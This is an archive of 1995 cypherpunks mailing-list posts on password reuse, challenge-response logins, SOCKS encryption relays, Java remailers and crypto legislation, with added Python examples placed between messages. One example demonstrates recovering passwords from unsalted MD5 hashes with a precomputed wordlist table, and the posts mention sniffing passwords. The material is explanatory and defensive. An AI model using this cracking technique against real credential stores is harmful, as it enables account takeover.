   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 21 Jul 95 20:26:55 PDT
To: Chris Gorsuch <cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <199507220323.UAA04489@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:17 PM 7/21/95 -0500, Chris Gorsuch wrote:
  [ stuff about keeping a dictionary of previously used passwords to prevent
reuse ]
>   A "cryptographic" solution would be to simply store a hash of the password
>rather than the password itself in the "appended" dictionary.  A CRYPTOGRAPHIC
>solution would be to use one time passwords :).

Be _very_ careful if you try this.  After all, it's an invitation for anybody
who runs the dictionary to use a crack program on the convenient list of hashes.
(If you use the same hash as the password file, you haven't risked _too_ much,
but using something fast like MD5 invites people to use their pre-computed
"MD5's of a million wimpy passwords" list.)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*
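
The password-history idea from Chris Gorsuch's message and the caution in the reply above, as an added example that is not part of either post: it contrasts a history of bare MD5 hashes with one that keeps a random salt and a deliberately slow hash per entry. PBKDF2-HMAC-SHA256 is swapped in here for "the same hash as the password file"; the iteration count, function names, passwords and word list are constructed assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000   # assumption: tune so one check costs noticeable CPU time


def md5_entry(password):
    """The fast, unsalted form the reply warns about."""
    return hashlib.md5(password.encode()).hexdigest()


def slow_entry(password):
    """A per-entry random salt plus a slow hash, stored together."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def was_used_before(password, history):
    """Reuse check: recompute with each entry's own salt, compare in constant time."""
    hit = False
    for salt, digest in history:
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
        hit |= hmac.compare_digest(candidate, digest)
    return hit


def table_lookup(md5_history, precomputed):
    """What a precomputed hash table gives whoever can read an unsalted history."""
    return [precomputed[h] for h in md5_history if h in precomputed]


def demo():
    old_passwords = ["letmein", "Tr0ub4dor&3x"]        # constructed sample data
    wordlist = ["password", "letmein", "qwerty"]       # constructed "wimpy passwords"
    precomputed = {md5_entry(w): w for w in wordlist}  # built once, reusable on any list

    md5_history = [md5_entry(p) for p in old_passwords]
    slow_history = [slow_entry(p) for p in old_passwords]

    # The same password stored twice yields different entries, so no table
    # computed in advance applies; each guess costs ITERATIONS hashes per entry.
    # Guessing against a stolen history is still possible, only more expensive,
    # so the history file needs the same protection as the password file.
    first, second = slow_entry("letmein"), slow_entry("letmein")

    return {
        "md5_recovered": table_lookup(md5_history, precomputed),
        "salted_entries_differ": first != second,
        "reuse_blocked": was_used_before("letmein", slow_history),
        "new_allowed": not was_used_before("a new passphrase", slow_history),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```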





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.net>
Date: Fri, 21 Jul 95 05:48:05 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Netscape the Big Win
In-Reply-To: <199507201453.HAA19510@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.950721195913.32735G-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 20 Jul 1995, Hal wrote:

> Note though that neither SSL nor SHTTP requires that the certificates come
> from RSA.  However the current versions of Netscape's browser do require this.
> This has been the source of much complaint and Netscape has promised that
> they will have some mechanism in the future to allow the user to
> choose his certificate signers.  I am not sure how far RSA will let them
> off the leash, though.

We may bypass them altogether (see below).

> Back to Perry:
> 
> >Netscape is a closed system. You can't write code for it unless you
> >work for Netscape.
> 
> That is why I am working on the proxy approach.  Any browser should be
> able to use enhancements supplied in this way.  Netscape is the big name
> this year, who knows who it will be next year.  As long as IP
> connectivity is available a proxy can get into the stream and apply
> enhancements.

I still maintain that an approach based on SOCKS would be more flexible, 
adaptable to any TCP-based application. Here's what I'm thinking about:

1. Windows apps: a general purpose socksifier, intercepting Winsock API
calls by *unmodified* applications and opening a single TCP connection to 
the port 1080 of a sockd server. The good news is: some good folks at NEC 
are already working at this project, and are looking for beta-testers.

2. A "SOCKS en/decrypting relay": a sockd server that, on a 
per-site/per-port basis depending on a configuration file, may either 
 a) open TCP connections on behalf of its clients; 
 b) relay a plain SOCKS connection to a remote peer;
 c) open an SSL connection to a remote peer (on, say, a port 1180 reserved
    for "SSL-ized SOCKS" connections)
Of course, that beast should also listen at the ports 1080 and 1180 and 
take the same actions a) b) or c) as appropriate.

The SOCKS en/decrypting relay could be written both as MS-Windows DLL and as 
UNIX daemon. The chain would be:

- From a Windows client machine:

 Standard app -> Socksifier DLL by NEC -> encrypting relay -----> 
  ---> Internet -----> decrypting relay -> server

- From a Unix client machine:

 Socksified (recompiled) app -> encrypting relay ------>
  ---> Internet -----> decrypting relay -> server

I'm assuming here that the encrypting relay should live close to the client
app (on the same machine or, at least, on the same network), and the
decrypting relay close to the server. A single daemon could do both jobs, 
allowing chaining "a` la remailer", but I'm using here two different 
names for sake of clarity. Besides, the Windows version probably wouldn't 
need decrypting ability.

Great advantage over Netscape: we could use EAY's free SSL implementation,
and all the server administrators could generate and sign their own
certificates. The present trouble with Netscape is that NS-Navigator
refuses to accept certificates not signed as "Netscape compatible". Our
en/decrypting relay could be more forgiving :-) As the SSL stuff built in
Netscape would be unused, we could also improve the protocol (plugging
security holes) ignoring compatibility issues. The administrators of
secure servers should just advise the users to configure their local
encrypting relays to pass through their decrypting relay (that would boil
down to a line added to the encrypting relay configuration). 

It would all be beautifully modular, relatively simple to code (as someone
else has done, or is doing, most of the hard work) and independent from
big-brother certifying authorities. 

Comments?
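
A sketch of the per-site/per-port decision the relay described above would make, as an added example that is not part of the original post. The configuration syntax, the fail-closed default when no rule matches and the documentation-range addresses are assumptions; the request layout is the SOCKS4 CONNECT format, and ports 1080 and 1180 are the ones named in the post.

```python
import ipaddress
import struct

PLAIN_SOCKS_PORT = 1080   # standard SOCKS port, as in the post
SSL_SOCKS_PORT = 1180     # the post's suggested port for "SSL-ized SOCKS"

# Constructed configuration in a hypothetical format:
# destination network, destination port (or *), action, peer relay (if any).
CONFIG = """
192.0.2.0/24      443   ssl      203.0.113.10   # action c) encrypt to the remote relay
192.0.2.0/24      *     socks    203.0.113.10   # action b) plain SOCKS to the remote relay
198.51.100.0/24   *     direct                  # action a) connect on the client's behalf
"""


def parse_rules(text):
    """Turn the configuration text into an ordered list of rules."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) not in (3, 4):
            raise ValueError(f"bad rule: {line!r}")
        net = ipaddress.ip_network(fields[0])
        port = None if fields[1] == "*" else int(fields[1])
        action = fields[2]
        peer = fields[3] if len(fields) == 4 else None
        if action not in ("direct", "socks", "ssl"):
            raise ValueError(f"unknown action: {action!r}")
        if action != "direct" and peer is None:
            raise ValueError(f"{action} rule needs a peer relay: {line!r}")
        rules.append((net, port, action, peer))
    return rules


def parse_socks4_connect(data):
    """Parse VN, CD, DSTPORT, DSTIP, USERID, NUL from a SOCKS4 CONNECT request."""
    if len(data) < 9:
        raise ValueError("request too short")
    version, command, port, raw_ip = struct.unpack("!BBH4s", data[:8])
    if version != 4 or command != 1:
        raise ValueError("not a SOCKS4 CONNECT request")
    end = data.find(b"\x00", 8)
    if end == -1:
        raise ValueError("USERID is not NUL-terminated")
    return ipaddress.IPv4Address(raw_ip), port, data[8:end]


def next_hop(dst_ip, dst_port, rules):
    """First matching rule wins; return (action, host, port) for the outgoing leg."""
    for net, port, action, peer in rules:
        if dst_ip in net and port in (None, dst_port):
            if action == "direct":
                return ("direct", str(dst_ip), dst_port)
            if action == "socks":
                return ("socks", peer, PLAIN_SOCKS_PORT)
            return ("ssl", peer, SSL_SOCKS_PORT)
    # Assumption: refuse rather than silently send unlisted traffic in the clear.
    return ("deny", None, None)


def route(request_bytes, rules):
    dst_ip, dst_port, _userid = parse_socks4_connect(request_bytes)
    return next_hop(dst_ip, dst_port, rules)


def sample_request(ip, port, userid=b"demo"):
    """Build a constructed SOCKS4 CONNECT request for the demo."""
    return struct.pack("!BBH4s", 4, 1, port, ipaddress.IPv4Address(ip).packed) + userid + b"\x00"


if __name__ == "__main__":
    rules = parse_rules(CONFIG)
    for ip, port in [("192.0.2.7", 443), ("192.0.2.7", 25), ("198.51.100.5", 80), ("10.0.0.1", 80)]:
        print(ip, port, "->", route(sample_request(ip, port), rules))
```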





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Fri, 21 Jul 95 18:42:27 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Netscape the Big Win(dows)
In-Reply-To: <199507211829.OAA08315@bb.hks.net>
Message-ID: <199507220147.VAA13565@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:

> I remember writing here once that after someone tries surfing the Web with
> Mosaic, there is no going back to just using lynx. The same holds true for
> Anarchie, Newswatcher, Eudora -- and Netscape.

Au contraire. I finally got the chance to use Netscape, and although I AM
impressed, I still prefer Lynx. Most folks will probably call this pointless
stubbornness, elitism, I don't care. Graphics are too damn slow at any
speed and personally, I have no need (or desire) to have my net connection
slow to a snail's crawl just to make it "look nicer". 

Text mode looks just fine to me. It's the content that matters.

-- 

 http://yakko.cs.wmich.edu/~frogfarm      |          PGP signed mail preferred
"On a superhighway existing roads are destroyed, it's easy to monitor traffic,
you can't make your on-ramp, politics controls development and they arrest you
if you go too fast, travel in your own direction or use unapproved technology."
 - kpc@ptolemy.arc.nasa.gov               |              Freedom...yeah, right.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Fri, 21 Jul 95 19:53:07 PDT
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: Netscape the Big Win(dows)
In-Reply-To: <199507220147.VAA13565@yakko.cs.wmich.edu>
Message-ID: <Pine.SUN.3.91.950721215547.667E-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Damaged Justice wrote:

> Lucky Green writes:
> 
> > I remember writing here once that after someone tries surfing the Web with
> > Mosaic, there is no going back to just using lynx. The same holds true for
> > Anarchie, Newswatcher, Eudora -- and Netscape.
> 
> Au contraire. I finally got the chance to use Netscape, and although I AM
> impressed, I still prefer Lynx. Most folks will probably call this pointless
> stubbornness, elitism, I don't care. Graphics are too damn slow at any
> speed and personally, I have no need (or desire) to have my net connection
> slow to a snail's crawl just to make it "look nicer". 
> 
> Text mode looks just fine to me. It's the content that matters.
 
Ever heard the old adage "a picture is worth a thousand words" 8-)

-Mike

**************************************************************************
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*                http://www.computek.net/public/bailey                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Fri, 21 Jul 95 19:05:17 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java (was Netscape: the big win)
In-Reply-To: <Pine.3.89.9507211802.F26107-0100000@khijol>
Message-ID: <9507220205.AA19644@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[I've cc:ed this to the Mixmaster development list --Futplex]

Andrew Loewenstern writes:
> If a Mixmaster client were available in Java (and I'm pretty sure it can be  
> done) then suddenly everyone who previously could only use the penet server  
> can now also use Mixmaster.  With more people using the remailer network, 
> all of them with Java clients, the possibility of for-pay remailers could
> become reality (no promises that you'll get rich though).

Ed Carp writes:
# The problem, Java only runs on a pretty restricted set of software.  I 
# don't have to be running Solaris to take advantage of penet.

True, but an important part of the promise of Java is that many people are
AFAIK actively working on porting it to most major platforms. Right now it
apparently runs only on Solaris 2.3+ and Win NT 3.5. However, Sun is working
on porting it to Win `95 and Mac System 7.5. I assume other people are
trying to port it to other Unices. I recognize that this is RSN again, but
I believe there is reason for optimism in this case.

I'm getting extremely interested in porting the Mixmaster client to Java.
Doug Barnes' enthusiasm at the last BA phys. mtg. has proven infectious,
with a delayed reaction in my case ;).  I plan to say more about this
notion on mix-l within the next few days.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 21 Jul 95 22:29:51 PDT
To: cypherpunks@toad.com
Subject: Free Java courses in CA
Message-ID: <v02120d18ac364a63878d@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


[[ This is another reason why I think Java is worth looking into --
   on one hand, there will always be free tools available, in addition
   to commercial tools; on the other hand, it is being strongly
   supported by SUN ]]


The SUN Sacramento Training Center announces the following FREE courses.

The Java Programming Series: #1 An Overview of the Java Language
The Java Programming Series: #2 Accessing Data Files
The Java Programming Series: #3 Simple GUI Applications
The Java Programming Series: #4 Program-to-Program Communication
The Java Programming Series: #5 Applets Design and Implementation
The Java Programming Series: #6 Accessing an Oracle RDBMS

Each course is:
  - 2 hours in length (they always start at 9:00 AM on Fridays)
  - fast paced
  - an introduction to the course topic
  - FREE

It is assumed that each student:
  - knows C and/or C++ language syntax
  - has a basic understanding of object oriented programming
  - has a personality that enjoys taking a jump-start course and then
    learning the rest of the technology via projects, newsgroups, and
    email-alias discussions.


You should NOT attend this class if:

  You are a techno-weenie.

  You are already an experienced JAVA programmer.


Instructor: Matthew Calame

--------------------------------------------------------------------

A DRESS CODE is REQUIRED of all students.

Dress Code: Traditional Silicon Valley casual attire
            (blue jeans and company tee-shirt)



--------------------------------------------------------------------

Current Schedule:

08/04/95  The Java Programming Series: #1 An Overview of the Java Language
08/18/95  The Java Programming Series: #2 Accessing Data Files
09/22/95  The Java Programming Series: #3 Simple GUI Applications
10/06/95  The Java Programming Series: #4 Program-to-Program Communication
10/20/95  The Java Programming Series: #5 Applets Design and Implementation
11/03/95  The Java Programming Series: #6 Accessing an Oracle RDBMS

Note: If your group needs training at a different location or at different
times, please contact matthew.calame@west.sun.com.

--------------------------------------------------------------------

Courses will be held at:

  Sun Microsystems
  8880 Cal Center Drive
  Suite 200
  Sacramento, CA 95826

--------------------------------------------------------------------
To Enroll:

  (1) Send an email to:

        java-training@sacto.west.sun.com

      The email should contain your:

        Name:
        Company Name:
        Mailing Address:
        Telephone Number:
        Fax Number:
        Email Address:

  **OR**

  (2) Send a fax to:

        916-362-3287
        Attn: Matthew Calame

      The fax should contain your:

        Name:
        Company Name:
        Mailing Address:
        Telephone Number:
        Fax Number:
        Email Address:

--------------------------------------------------------------------




Regards,
Matt

----------------------------------------------------------------
                       Matthew B. Calame
                       Systems Engineer
             Sun Microsystems Computer Corporation

             Phone: 916-856-5507 or 916-856-5500
             Email: matthew.calame@West.Sun.COM
             Fax: 916-362-3287
             Sun Mailstop: USAC02
             Address:
               Sun Microsystems
               8880 Cal Center Drive
               Suite 200
               Sacramento, CA  95826
----------------------------------------------------------------

-
Note to Sun employees: this is an EXTERNAL mailing list!
Info: send 'help' to java-interest-request@java.sun.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 21 Jul 95 20:02:16 PDT
To: usura@replay.com (Alex de Joode)
Subject: Re: big word listing
In-Reply-To: <199507220006.AA27598@xs1.xs4all.nl>
Message-ID: <199507220301.XAA28535@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Is there a "challenge response" type of password/login available
| somewhere ?

	There's S/Key, (also called OPIE), OTP from Avi Rubin at
Bellcore, and I think one or two others.  There are also hardware
solutions, sold by ANS, DEC, and others.

	If you want real in-depth answers, try firewalls.
(majordomo@greatcircle.com)


Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Fri, 21 Jul 95 20:11:28 PDT
To: Alex de Joode <usura@replay.com>
Subject: Re: big word listing
Message-ID: <199507220309.XAA22246@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Alex sez:

> Is there a "challenge response" type of password/login available
> somewhere ?
> 

Post Office Protocol 3 (POP3) has an optional command called 
APOP which sends a string of the form "<process-ID.clock@hostname>".
The POP3 client calculates the MD5 digest of 
 
  <process-ID.clock@hostname>password

and sends it to the server as "APOP username 58349485whatever89583449".

I like it.

Regards,


--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
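
The APOP exchange described in the message above, as an added example that is not part of the original post: the server greeting carries the challenge, the client answers with MD5(challenge + password), and the server recomputes it. The class and function names, the host mail.example.org, the account "alice" and the random suffix in the challenge are assumptions made for this sketch.

```python
import hashlib
import hmac
import os
import time


def make_challenge(hostname):
    """Return a fresh '<process-ID.clock@hostname>' style challenge.

    The random suffix is an assumption of this sketch: it keeps two
    greetings issued in the same second from sharing a challenge.
    """
    return "<%d.%d.%s@%s>" % (os.getpid(), int(time.time()),
                              os.urandom(4).hex(), hostname)


def apop_digest(challenge, secret):
    """MD5 over the challenge immediately followed by the password, in hex."""
    return hashlib.md5((challenge + secret).encode("utf-8")).hexdigest()


def client_response(greeting, user, secret):
    """Pull the <...> challenge out of the greeting and build the APOP line."""
    start, end = greeting.find("<"), greeting.rfind(">")
    if start == -1 or end < start:
        raise ValueError("server greeting carries no APOP challenge")
    return "APOP %s %s" % (user, apop_digest(greeting[start:end + 1], secret))


class ApopServer:
    """Server side of the exchange (hypothetical class, constructed accounts)."""

    def __init__(self, hostname, secrets_by_user):
        self.hostname = hostname
        # The server must hold the password itself, not a one-way hash of
        # it, because it has to recompute MD5(challenge + password).
        self._secrets = dict(secrets_by_user)
        self._pending = {}  # session id -> challenge that has not been used

    def greet(self, session_id):
        challenge = make_challenge(self.hostname)
        self._pending[session_id] = challenge
        return "+OK POP3 server ready " + challenge

    def handle_apop(self, session_id, line):
        # Each challenge is good for one attempt: pop it before checking.
        challenge = self._pending.pop(session_id, None)
        parts = line.split()
        if challenge is None or len(parts) != 3 or parts[0].upper() != "APOP":
            return "-ERR permission denied"
        _, user, digest = parts
        secret = self._secrets.get(user)
        # Unknown users are checked against a throwaway secret so the code
        # path is the same as for a wrong password.
        candidate = secret if secret is not None else os.urandom(16).hex()
        expected = apop_digest(challenge, candidate)
        match = hmac.compare_digest(expected.encode("utf-8"),
                                    digest.lower().encode("utf-8"))
        if match and secret is not None:
            return "+OK maildrop locked and ready"
        return "-ERR permission denied"


def demo():
    """Run one good login, then the failure cases, and return the replies."""
    server = ApopServer("mail.example.org", {"alice": "correct horse"})

    greeting = server.greet("s1")
    wire = client_response(greeting, "alice", "correct horse")
    login = server.handle_apop("s1", wire)
    reuse = server.handle_apop("s1", wire)      # challenge already spent

    server.greet("s2")                           # new session, new challenge
    replay = server.handle_apop("s2", wire)      # old line no longer matches

    greeting3 = server.greet("s3")
    wrong = server.handle_apop(
        "s3", client_response(greeting3, "alice", "guess"))

    return {"wire": wire, "login": login, "reuse_same_session": reuse,
            "replay": replay, "wrong_password": wrong}


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-20s %s" % (name, value))
```

The exchange keeps the password off the wire, but the server has to store it in recoverable form, and the mail retrieved after login still travels in the clear.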




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 21 Jul 95 21:16:47 PDT
To: owner-cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <9507220416.AA27159@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>or set it as a variable and fork, or something like that.

Berkeley-derived unices have a "ps" that can print the environment.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Shabbir J. Safdar" <shabbir@panix.com>
Date: Fri, 21 Jul 95 21:51:48 PDT
To: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <30106384.flight@flight.hrnowl.lonestar.org>
Message-ID: <199507220451.AAA25935@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



[From http://www.cnu.edu/~patrick/taoism/suntzu/suntx10.txt]

Sun Tzu?  SUN TZU you say?

>5. The general, unable to control his irritation,
>    will launch his men to the assault like swarming ants,
>    with the result that one-third of his men are slain,
>    while the town still remains untaken.  Such are the disastrous
>    effects of a siege.

Let's not lay siege to this bill prematurely.  Should we call grass roots
supports too early, people will become aggravated with being asked to
act on bills that aren't really a threat.

> 6. Therefore the skillful leader subdues the enemy's
>    troops without any fighting; he captures their cities
>    without laying siege to them; he overthrows their kingdom
>    without lengthy operations in the field.

Let's give the DC folks a chance to convince *those that control the
Congressional schedule* to keep this bill from going anywhere.

>17. Thus we may know that there are five essentials
>   for victory:
>   (1) He will win who knows when to fight and when
>       not to fight.

Now is not the time to fight this with "call in campaigns".  We haven't
even had time to digest the analyses.  Sure we understand the crypto part,
but should we call Grassley's office, you'll probably get back, "but there
are so many other holes in current law that this bill fixes, how can
you be opposed to it?"

Unaware of the rest of the bill, we'll be caught flat footed.

Look, every net-civlib group in DC is committed to the availability of
strong crypto.  There isn't a one of them who has ever ignored a fight
yet against crypto restrictions.  If several of them (who have really
good resources inside the capital, better than all of us) say that
the bill is NOT going anywhere, and that the best thing to do right now
is to study it and get ready in case it does move, what better
information do you have that convinces you that they're wrong?

We should read the bill, and we should be pissed.  But calling the wrath
of the net down on this bill is wasteful at this stage.  Sure it may get
thrown in as an amendment, that's always possible.  But if that's Grassley's
strategy, no amount of call-in support is going to help, because nobody,
not even that Senator you just called who promised you s/he opposes
AER will know what happened until it is too late.

Let's read the bill and get ready for a fight.  We should hold Grassley
accountable for this next election.  But we're spinning our wheels by
acting against every bill that affects one of our issues.

-Shabbir




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Fri, 21 Jul 95 17:23:47 PDT
To: cypherpunks@toad.com
Subject: Re: Phrack SummerCon - I enjoyed your talk
Message-ID: <199507220001.AA27218@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Owen Lynn sez:
: Eric,

: I was there in 'lanta when you gave your talk at SummerCon, and I
: thoroughly enjoyed it. I was especially intrigued by some of the, um,
: fun you can have with corporations. Are there any books I can read
: that are sort of _Fun with Your Corporation for Beginners_?

Corporation as in a Delaware "Inc" ? Are there transcripts of the
speech available ?

--
/ME							kewl as fuck !




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Fri, 21 Jul 95 18:04:32 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <199507220006.AA27598@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Jim Gillogly sez:

: Also you should be aware that cracking passwords is passe' these days:
: it's much easier to run an ethernet sniffer and gather them wholesale.
: Every little bit helps, though.

Is there a "challenge response" type of password/login available
somewhere ?

--
/ME							kewl as fuck !




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 21 Jul 95 23:12:32 PDT
To: cypherpunks@toad.com
Subject: Re: It had to happen...
Message-ID: <v02130503ac363a5845f6@hal9001.dialup.access.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 7/21/95, David Lesher wrote:
>Note that last I heard RM Sr. had retired & moved to New England.
>He is an interesting ....character... for lack of a better word.

I got that impression from the description in Cuckoo's Egg.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Fri, 21 Jul 95 20:50:25 PDT
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <199507212057.QAA15341@eff.org>
Message-ID: <30106384.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> We've not "bowed out" on this bill, it's just not significant enough a 
> threat (yet) to warrant stirring up a lot of activism about it - which 
> would detract from the focus on the CDA and its clones.
> 
> We'll be tracking this bill and will certainly help form a campaign against 
> it if it looks to be going anywhere. In the mean time, we're issuing an 
> analysis of it, and will keep the net informed.
> 

Sun Tzu in his classic _The Art of War_ says:

"Therefore those who win every battle are not really skillful--those
who render others' armies helpless without fighting are the best of
all.

The superior militarist strikes while schemes are being laid. The
next best is to attack alliances.  The next best is to attack the army."

"To unfailingly take what you attack, attack where there is no defense.
For unfailingly secure defense, defend where there is no attack.

So in the case of those who are skilled in attack, their opponents do not
know where to defend. In the case of those skilled in the art of defense,
their opponents do not know where to attack."

"Be extremely subtle, even to the point of formlessness. Be extremely 
mysterious, even to the point of soundlessness. Thereby you can be 
the director of the opponent's fate.

To advance irresistibly, push through their gaps. To retreat elusively,
outspeed them."

I am afraid that if those who favor network freedom do not apply
Sun Tzu's principles we may be defeated. What are we doing to
"attack while the schemes are being laid?" If we were to provoke
opposition now in the beginning, it would create the impression
that if the bill were to become a threat, then there would be furious
opposition. We have a chance to win by indirection. But we are losing
it by inaction. Sun Tzu recommends the use of spies, but because
the net civil liberties organizations are inactive, we are deprived of 
our spies. We do not even know which subcommittee it has been sent to.
We do not know which Senators we should direct the pressure to.

I am now making inquiries from here in Texas (through the offices
of the Texas Senators) as to what subcommittee. But it may take
a while. But this information should be easily available to organizations
like EFF and VTW. It should be in an action alert so that people like
me here in Texas do not have to search for it using non-optimal means.

If anybody knows which subcommittee the bill has been sent to, please
tell me.

-- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Sat, 22 Jul 95 01:01:59 PDT
To: hayden@krypton.mankato.msus.edu (Robert A. Hayden)
Subject: Three strikes you're out!  for politicians... yeah we wish!
In-Reply-To: <Pine.ULT.3.91.950721113352.5103A-100000@krypton.mankato.msus.edu>
Message-ID: <m0sZZTz-001Bg4C@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> 
> About two weeks ago, there was some talk in here with regards to holding 
> DC lawmakers criminally liable for passing bad laws.  This was followed 
> up with postings pointing out that you can't do that.

Here's something you *can* do:  

"Three strikes you're out" for politicians.

Any time the Supreme Court strikes down a law, any politician who has been 
found to have voted in favor of three such laws is immediately stripped of
all offices and rendered ineligible to run for public office ever again,
at any level.  (The same might apply to those found to have lied to a court

A politician who would trade citizen rights for political gain must be denied
the benefits of such a tradeoff.  This might prevent the rise of demagogues.
Term limits, etc., would of course help as well.  It would also give those
politicians who vote for 'motherhood' issues like 'protecting kids from the
perverts on the Internet' a good reason to think twice about the real issue.
If they REALLY believe they are protecting someone, they will still vote in
favor.  If they are going with the flow to avoid criticism, they'll lose in
the end.

My reasoning is that any politician whose laws are consistently struck down
should be deemed to lack a fundamental understanding of the rights of the
citizens of his/her country or jurisdiction.  They are thus a poor guardian
of those rights.

You heard it here first.
 
Craig Hubley




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 22 Jul 95 06:05:52 PDT
To: cypherpunks@toad.com
Subject: An idea about Java and remailer clients and servers...
Message-ID: <199507221301.AA27475@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



I think someone mentioned the possibility of running a Mixmaster
client in Java.

I was under the impression that there was a lot of common code
between the Mixmaster client and server versions, at least in
the current version.

Does it have to be the case, then, that we even have separate client
and server versions? If a new program is going to be written in Java,
can't it have the functionality of both client and server?

Why not "charge" for the ability to send an anonymous message with
the duty to have for a short time (maybe an hour or two) running on
your machine a node in a remailer network?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bigdaddy@ccnet.com
Date: Sat, 22 Jul 95 09:54:08 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Netscape the Big Win(dows)
In-Reply-To: <v01520d01ac3621ac8676@[192.0.2.1]>
Message-ID: <Pine.3.89.9507220907.A2360-0100000@ccnet3>
MIME-Version: 1.0
Content-Type: text/plain


